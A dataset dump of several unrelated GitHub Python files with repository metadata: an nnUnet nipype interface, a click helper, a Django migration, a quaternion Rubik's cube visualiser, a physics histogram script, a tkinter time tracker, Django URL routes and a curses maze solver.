directory', argstr='-o %s')\n model_folder = Directory(mandatory=True, exist=True,\n desc='Folder with the results of the nnUnet'\n 'training.', argstr='-m %s')\n prefix = traits.Str()\n\n\nclass NNUnetInferenceOutputSpec(TraitedSpec):\n\n output_folder = Directory(exist=True, desc='Output directory')\n output_file = File(exists=True, desc='First nifti file inside the'\n ' output folder.')\n\n\nclass NNUnetInference(CommandLine):\n\n _cmd = 'predict_simple.py'\n input_spec = NNUnetInferenceInputSpec\n output_spec = NNUnetInferenceOutputSpec\n\n def _list_outputs(self):\n outputs = self._outputs().get()\n output_folder = self._gen_outfilename()\n outputs['output_folder'] = output_folder\n outputs['output_file'] = sorted(glob.glob(\n os.path.join(output_folder, '*.nii.gz')))[0]\n\n return outputs\n \n def _gen_outfilename(self):\n output_folder = self.inputs.output_folder\n if not isdefined(output_folder) and isdefined(self.inputs.input_folder):\n basepath = '/'.join(self.inputs.input_folder.split('/')[:-1])\n outname = 'nnunet_inference_{}'.format(self.inputs.prefix)\n output_folder = os.path.join(basepath, outname)\n# output_folder = 'nnunet_inference'\n return os.path.abspath(output_folder)\n\n def _gen_filename(self, name):\n if name == 'output_folder':\n return self._gen_outfilename()\n return None\n\n", "repo_name": "TransRadOnc-HIT/RADIANTS", "sub_path": "radiants/interfaces/mic.py", "file_name": "mic.py", "file_ext": "py", "file_size_in_byte": 7931, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 16, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 17, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 20, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", "line_number": 23, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 25, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 25, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Enum", "line_number": 26, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 26, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 31, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 31, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 36, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 36, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 40, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 40, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 44, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 44, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Int", "line_number": 46, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 46, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.TraitedSpec", "line_number": 51, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", 
"line_number": 53, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.File", "line_number": 54, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 57, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 66, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 74, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 75, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 77, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 83, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 84, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 89, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 104, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 106, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 106, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 108, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 108, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 110, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 110, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.File", "line_number": 112, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 112, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 114, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 114, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.TraitedSpec", "line_number": 117, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.File", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 122, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 137, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 140, "usage_type": "call"}, {"api_name": "core.utils.filemanip.split_filename", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.CommandLineInputSpec", "line_number": 148, "usage_type": "name"}, {"api_name": 
"nipype.interfaces.base.Directory", "line_number": 150, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 152, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 154, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits.Str", "line_number": 157, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.traits", "line_number": 157, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.TraitedSpec", "line_number": 160, "usage_type": "name"}, {"api_name": "nipype.interfaces.base.Directory", "line_number": 162, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.File", "line_number": 163, "usage_type": "call"}, {"api_name": "nipype.interfaces.base.CommandLine", "line_number": 167, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "nipype.interfaces.base.isdefined", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}]} +{"seq_id": "2692903708", "text": "import click\nfrom enum import Enum\nfrom typing import TypeVar, Type\n\n\nE = TypeVar(\"E\", bound=Enum)\n\n\ndef parse_choice(factory: Type[E]):\n def _parse(ctx, param, value) -> None:\n values = list(map(lambda e: e.value, factory))\n param.type = click.Choice(values)\n param.expose_value = False\n if value:\n ctx.params[param.name] = factory(value)\n\n return _parse\n", "repo_name": "he-dev/reusable-py", "sub_path": "daily_click/src/daily_click/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 6, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 9, "usage_type": "name"}, {"api_name": "click.Choice", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "23527930356", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0006_catalog_page_number'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='catalog',\n name='page_number',\n ),\n migrations.AddField(\n model_name='catalogpage',\n name='page_number',\n field=models.PositiveIntegerField(verbose_name='Page Number', default=1),\n preserve_default=False,\n ),\n ]\n", "repo_name": "rogergaitan/granadatiles", "sub_path": "granadatiles_project/apps/news/migrations/0007_auto_20160303_1832.py", "file_name": "0007_auto_20160303_1832.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", 
"line_number": 14, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "37035353613", "text": "import matplotlib.pyplot as plt\r\nimport math\r\nfrom mpl_toolkits import mplot3d\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\r\nimport random as rand\r\n\r\nclass quaternion():\r\n \"\"\"Generic quaternion class\r\n \r\n \"\"\"\r\n def __init__(self,c,x,y,z):\r\n \"\"\"Create quaternion\r\n \r\n Arguments:\r\n (c,x,y,z) = c + xi + yj + zk\r\n \"\"\"\r\n self.c=c\r\n self.x=x\r\n self.y=y\r\n self.z=z\r\n \r\n def get_coord(self):\r\n \"\"\"Obtain coordinates\r\n \r\n Returns:\r\n (float, float, float, float) -- coordinates\r\n \"\"\"\r\n return (self.c, self.x, self.y, self.z)\r\n\r\n def multiply(quat1, quat2):\r\n \"\"\"Multiply 2 quaternions. Note, order matters\r\n \r\n Arguments:\r\n quat1 {quaternion}\r\n quat2 {quaternion}\r\n \r\n Returns:\r\n quaternion - product of quat1*quat2\r\n \"\"\"\r\n (c1,x1,y1,z1)=quat1.get_coord()\r\n (c2,x2,y2,z2)=quat2.get_coord()\r\n \r\n c3=c1*c2-x1*x2-y1*y2-z1*z2\r\n x3=c1*x2+x1*c2+y1*z2-z1*y2\r\n y3=c1*y2-x1*z2+y1*c2+z1*x2\r\n z3=c1*z2+x1*y2-y1*x2+z1*c2\r\n \r\n return quaternion(c3,x3,y3,z3)\r\n \r\n def conjugate(quat):\r\n \"\"\"Returns conjugate (c - xi - yj - zk) of input\r\n \r\n Arguments:\r\n quat {quaternion}\r\n \r\n Returns:\r\n quaternion\r\n \"\"\"\r\n (c,x,y,z)=quat.get_coord()\r\n return quaternion(c,-x,-y,-z)\r\n\r\nclass face():\r\n def __init__(self, color, x,y,z, direction, size):\r\n self.color=color\r\n self.quat=quaternion(0,x,y,z)\r\n self.direction=quaternion(0,*direction)\r\n self.size=size\r\n \r\n def rotate(self, angle, x,y,z):\r\n s=math.sin(angle/2)\r\n r=quaternion(math.cos(angle/2), s*x, s*y, s*z)\r\n q1 = quaternion.multiply(r, self.quat)\r\n self.quat = quaternion.multiply(q1, quaternion.conjugate(r))\r\n \r\n q2 = quaternion.multiply(r, self.direction)\r\n self.direction = quaternion.multiply(q2, quaternion.conjugate(r))\r\n \r\n def draw(self, ax):\r\n (_,x,y,z)=self.quat.get_coord()\r\n (_,d1,d2,d3)=self.direction.get_coord()\r\n \r\n dim1=[-self.size, self.size, self.size, -self.size]\r\n dim2=[-self.size, -self.size, self.size, self.size]\r\n \r\n x_list=[x]*4\r\n y_list=[y]*4\r\n z_list=[z]*4\r\n \r\n idx = np.argmax([abs(d1), abs(d2), abs(d3)])\r\n \r\n if idx==0:\r\n y_list = [y_list[i]+dim1[i] for i in range(4)]\r\n z_list = [z_list[i]+dim2[i] for i in range(4)]\r\n elif idx==1:\r\n x_list = [x_list[i]+dim1[i] for i in range(4)]\r\n z_list = [z_list[i]+dim2[i] for i in range(4)]\r\n else:\r\n y_list = [y_list[i]+dim1[i] for i in range(4)]\r\n x_list = [x_list[i]+dim2[i] for i in range(4)]\r\n \r\n verts = [list(zip(x_list,y_list,z_list))]\r\n ax.add_collection3d(Poly3DCollection(verts, \r\n facecolors=self.color, linewidths=1, edgecolors='k', alpha=1))\r\n\r\nclass rubiks_cube():\r\n colors={'white':(1,0,0), 'red':(0,1,0), 'blue':(0,0,1), 'yellow':(-1,0,0), 'orange':(0,-1,0), 'green':(0,0,-1)}\r\n \r\n def __init__(self):\r\n self.faces=[]\r\n self.fig = plt.figure()\r\n self.ax = plt.axes(projection='3d')\r\n \r\n for c in self.colors:\r\n for i in [-2/3,0,2/3]:\r\n for j in [-2/3,0,2/3]:\r\n (x,y,z)=self.colors[c]\r\n if x != 0:\r\n y=i\r\n z=j\r\n elif y 
!= 0:\r\n z=i\r\n x=j\r\n else:\r\n x=i\r\n y=j\r\n self.faces.append(face(c,x,y,z,direction=self.colors[c], size=1/3))\r\n \r\n def draw(self):\r\n plt.cla()\r\n for f in self.faces:\r\n f.draw(self.ax)\r\n self.ax.set_xlim(-1.5,1.5)\r\n self.ax.set_ylim(-1.5,1.5)\r\n self.ax.set_zlim(-1.5,1.5)\r\n self.fig.canvas.draw()\r\n \r\n \r\n def turn_side(self, color, angle):\r\n vec = self.colors[color]\r\n for f in self.faces:\r\n q = f.quat\r\n v = (q.x*vec[0], q.y*vec[1], q.z*vec[2])\r\n if sum(v)>0.5:\r\n f.rotate(angle, *vec)\r\n \r\n def scramble(self, moves=20, draw=True):\r\n for i in range(moves):\r\n c = rand.choice(list(self.colors.keys()))\r\n angle = rand.choice([math.pi/2, -math.pi/2])\r\n self.turn_side(c,angle)\r\n if draw:\r\n self.draw()\r\n \r\n def is_solved(self):\r\n for f in self.faces:\r\n ans = [0]+[round(i) for i in self.colors[f.color]]\r\n d = [round(i) for i in f.direction.get_coord()]\r\n if ans!=d:\r\n return False\r\n return True\r\n \r\n \r\n\r\nif __name__=='__main__':\r\n rand.seed()\r\n plt.ion()\r\n r = rubiks_cube()\r\n r.draw()\r\n colors = {'w':'white', 'r':'red', 'b':'blue', 'y':'yellow', 'o':'orange', 'g':'green'}\r\n directions = {'+':math.pi/2, '-':-math.pi/2}\r\n while(True):\r\n i = input(\"Input command:\")\r\n try:\r\n if i=='break':\r\n break\r\n elif i=='help':\r\n print(\"break: exit program\")\r\n print(\"sXX: scramble cube (XX is the number of moves to scramble)\")\r\n print(\"?: check if cube is solved\")\r\n print(\"CD: rotate side. C-color{r,g,b,w,y,o}, D-direction{+,-}\")\r\n elif i==\"?\":\r\n print(r.is_solved())\r\n elif 's' in i:\r\n if len(i)>1:\r\n num=int(i[1:])\r\n else:\r\n num=20\r\n r.scramble(num)\r\n r.draw()\r\n else:\r\n c = colors[i[0]]\r\n d = directions[i[1]]\r\n r.turn_side(c,d)\r\n r.draw()\r\n except:\r\n print('Invalid input. 
Type \"help\" for details')", "repo_name": "andrewzhang505/rubiks_cube", "sub_path": "rubiks_cube.py", "file_name": "rubiks_cube.py", "file_ext": "py", "file_size_in_byte": 6156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.sin", "line_number": 71, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 90, "usage_type": "call"}, {"api_name": "mpl_toolkits.mplot3d.art3d.Poly3DCollection", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 149, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 150, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 150, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 171, "usage_type": "attribute"}]} +{"seq_id": "689593546", "text": "import sys\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom common.constants import boltzmann_constant\nfrom common.lattice_tools.common import change_basis\nfrom md.configuration import MDConfig\n\n\nif __name__ == '__main__':\n temp_dir = Path(sys.argv[1])\n print(sys.argv[1])\n\n cum_pos_hist = None\n\n for temp_ind_dir in temp_dir.glob('*'):\n if not temp_ind_dir.is_dir():\n continue\n print(temp_ind_dir)\n\n config = MDConfig.load(temp_ind_dir)\n resolution = 100\n\n positions = np.load(config.working_directory / 'absorbate_positions.npy')[:2]\n\n in_first_cell_lattice_coords = change_basis(\n np.linalg.inv(config.in_plane_basis[:2, :2]),\n positions\n ) % 1\n\n half_bin_width = 1 / resolution / 2\n\n x_bin_edges = np.linspace(- half_bin_width, 1 + half_bin_width, resolution + 2)\n y_bin_edges = np.linspace(- half_bin_width, 1 + half_bin_width, resolution + 2)\n\n # import matplotlib.pyplot as plt\n # plt.hist2d(*change_basis(config.in_plane_basis, in_first_cell_lattice_coords), bins=60)\n # plt.show()\n\n pos_hist, _, _ = np.histogram2d(*in_first_cell_lattice_coords, bins=[x_bin_edges, y_bin_edges])\n pos_hist[:, 0] += pos_hist[:, -1]\n pos_hist[0, :] += pos_hist[-1, :]\n\n pos_hist = pos_hist[:-1, :-1]\n\n if cum_pos_hist is None:\n cum_pos_hist = pos_hist\n else:\n cum_pos_hist += pos_hist\n\n potential_grid = - np.log(cum_pos_hist) * boltzmann_constant * config.temperature\n potential_grid -= potential_grid.min()\n\n np.save(temp_dir / 'potential_grid.npy', potential_grid)\n", "repo_name": "jjhw3/gle_research", "sub_path": "simulation_scripts/run_each_temp/bin_occupations.py", "file_name": "bin_occupations.py", "file_ext": "py", "file_size_in_byte": 1669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", 
"line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "md.configuration.MDConfig.load", "line_number": 22, "usage_type": "call"}, {"api_name": "md.configuration.MDConfig", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "common.lattice_tools.common.change_basis", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.histogram2d", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 52, "usage_type": "call"}, {"api_name": "common.constants.boltzmann_constant", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "22743714565", "text": "import tkinter as tk\nimport datetime\nimport csv\n\nclass TimeTrackerPro:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"300x350+50+50\")\n self.root.title(\"Time Tracker Pro\")\n\n self.timer_running = False\n self.start_time = None\n self.project_name = \"\"\n self.task_description = \"\"\n\n self.lbl_time = tk.Label(root, text=\"00:00:00\", font=(\"Helvetica\", 48))\n self.lbl_project = tk.Label(root, text=\"Project: \")\n self.lbl_description = tk.Label(root, text=\"Task Description: \")\n self.entry_project = tk.Entry(root)\n self.entry_description = tk.Entry(root)\n self.btn_start = tk.Button(root, text=\"Start\", command=self.start_timer)\n self.btn_stop = tk.Button(root, text=\"Stop\", command=self.stop_timer)\n self.btn_save = tk.Button(root, text=\"Save\", command=self.save_entry)\n\n self.lbl_time.pack(pady=20)\n self.lbl_project.pack()\n self.entry_project.pack()\n self.lbl_description.pack()\n self.entry_description.pack()\n self.btn_start.pack(pady=10)\n self.btn_stop.pack(pady=10)\n self.btn_save.pack(pady=10)\n\n def start_timer(self):\n if not self.timer_running:\n self.timer_running = True\n self.start_time = datetime.datetime.now()\n self.update_timer()\n\n self.project_name = self.entry_project.get()\n self.task_description = self.entry_description.get()\n\n def stop_timer(self):\n if self.timer_running:\n self.timer_running = False\n\n def save_entry(self):\n entry_data = {\n \"Project\": self.project_name,\n \"Description\": self.task_description,\n \"StartTime\": self.start_time,\n \"EndTime\": datetime.datetime.now()\n }\n \n now = datetime.datetime.now()\n filename = entry_data[\"Project\"] + '-' + str(now) + \".csv\"\n with open(filename, 'w') as f:\n w = csv.DictWriter(f, entry_data.keys())\n w.writeheader()\n w.writerow(entry_data)\n\n\n def update_timer(self):\n if self.timer_running:\n elapsed_time = datetime.datetime.now() - self.start_time\n elapsed_time_str = str(elapsed_time).split(\".\")[0] # Format: HH:MM:SS\n self.lbl_time.config(text=elapsed_time_str)\n self.root.after(1000, self.update_timer)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = TimeTrackerPro(root)\n root.iconphoto(False, tk.PhotoImage(file=\"icon.png\"))\n root.mainloop()\n\n", "repo_name": "PenguinPoweredApps/TimeTrackerPro", "sub_path": "time_tracker_pro.py", "file_name": "time_tracker_pro.py", "file_ext": "py", "file_size_in_byte": 2572, "program_lang": "python", "lang": 
"en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Label", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 17, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 55, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 71, "usage_type": "call"}, {"api_name": "tkinter.PhotoImage", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "2154731727", "text": "from django.urls import path, include\nfrom users import views\nfrom rest_framework.routers import SimpleRouter, DefaultRouter\n\n\nrouter = DefaultRouter()\nrouter.register(r'requests', views.MatchRequestViewSet)\nrouter.register(r'users', views.UserRetrieveUpdateViewSet)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('new/', views.UserCreateView.as_view()),\n path('users/', views.UserListView.as_view({'get': 'list'})),\n path('matches/', views.MatchedUsersView.as_view()),\n path('users/me', views.SelfUserView.as_view()),\n\n]\n", "repo_name": "mirzxc/animeet-django-rest", "sub_path": "users/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "users.views.MatchRequestViewSet", "line_number": 7, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 7, "usage_type": "name"}, {"api_name": "users.views.UserRetrieveUpdateViewSet", "line_number": 8, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "users.views.UserCreateView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "users.views.UserCreateView", "line_number": 13, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "users.views.UserListView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "users.views.UserListView", "line_number": 14, "usage_type": "attribute"}, {"api_name": 
"users.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "users.views.MatchedUsersView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "users.views.MatchedUsersView", "line_number": 15, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "users.views.SelfUserView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "users.views.SelfUserView", "line_number": 16, "usage_type": "attribute"}, {"api_name": "users.views", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "29437550920", "text": "\"\"\"\r\nDilyana Koleva, 2022\r\nIntermediate Python Projects - Breadth First Search\r\n\r\nIf working on PyCharm don't forget to edit the configuration to emulate terminal in output console\r\nEdit Configurations -> Click on the configuration -> Tick Emulate Terminal -> Apply\r\n\r\nAlso chances are the project won't run on PyCharm so run it directly through the terminal\r\n\r\n\"\"\"\r\nimport curses\r\nfrom curses import wrapper\r\nimport queue\r\nimport time\r\n\r\nmaze = [\r\n [\"#\", \"O\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\"],\r\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \"#\", \" \", \"#\", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \" \", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\r\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \"#\", \"#\"],\r\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\r\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"X\", \"#\"]\r\n]\r\n\r\n\r\ndef print_maze(maze, screen, path=[]):\r\n CYAN = curses.color_pair(1)\r\n RED = curses.color_pair(2)\r\n\r\n for i, row in enumerate(maze):\r\n for j, value in enumerate(row):\r\n if (i, j) in path:\r\n screen.addstr(i, j * 2, \"X\", RED)\r\n else:\r\n screen.addstr(i, j * 2, value, CYAN)\r\n\r\n\r\ndef find_start(maze, start):\r\n for i, row in enumerate(maze):\r\n for j, value in enumerate(row):\r\n if value == start:\r\n return i, j\r\n\r\n return None\r\n\r\n\r\ndef find_path(maze, screen):\r\n start = \"O\"\r\n end = \"X\"\r\n start_pos = find_start(maze, start)\r\n\r\n q = queue.Queue()\r\n q.put((start_pos, [start_pos]))\r\n\r\n visited = set()\r\n\r\n while not q.empty():\r\n current, path = q.get()\r\n row, col = current\r\n\r\n screen.clear()\r\n print_maze(maze, screen, path)\r\n time.sleep(0.2)\r\n screen.refresh()\r\n\r\n if maze[row][col] == end:\r\n return path\r\n\r\n neighbours = find_neighbours(maze, row, col)\r\n for n in neighbours:\r\n if n in visited:\r\n continue\r\n\r\n r, c = n\r\n if maze[r][c] == \"#\":\r\n continue\r\n\r\n new_path = path + [n]\r\n q.put((n, new_path))\r\n visited.add(n)\r\n\r\n\r\ndef find_neighbours(maze, row, col):\r\n neighbours = []\r\n\r\n if row > 0:\r\n neighbours.append((row - 1, col))\r\n if row + 1 < len(maze):\r\n neighbours.append((row + 1, col))\r\n if col > 0:\r\n neighbours.append((row, col - 1))\r\n if col + 1 < len(maze[0]):\r\n neighbours.append((row, col + 1))\r\n\r\n return neighbours\r\n\r\n\r\ndef main(screen):\r\n curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_WHITE)\r\n curses.init_pair(2, curses.COLOR_RED, curses.COLOR_WHITE)\r\n\r\n find_path(maze, screen)\r\n 
